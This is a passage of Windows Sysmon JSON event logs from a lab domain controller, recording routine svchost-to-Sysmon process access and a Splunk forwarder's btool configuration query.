06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3374,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-00107D6B0500}\r\nTargetProcessId: 1624\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-00107D6B0500}","TargetProcessId":"1624","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.889\r\nProcessGuid: {E2A3D6B1-1102-5F25-0000-0010396C0500}\r\nProcessId: 3052\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1102-5F25-0000-00107D6B0500}\r\nParentProcessId: 1624\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.889","ProcessGuid":"{E2A3D6B1-1102-5F25-0000-0010396C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1102-5F25-0000-00107D6B0500}","ParentProcessId":"1624","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
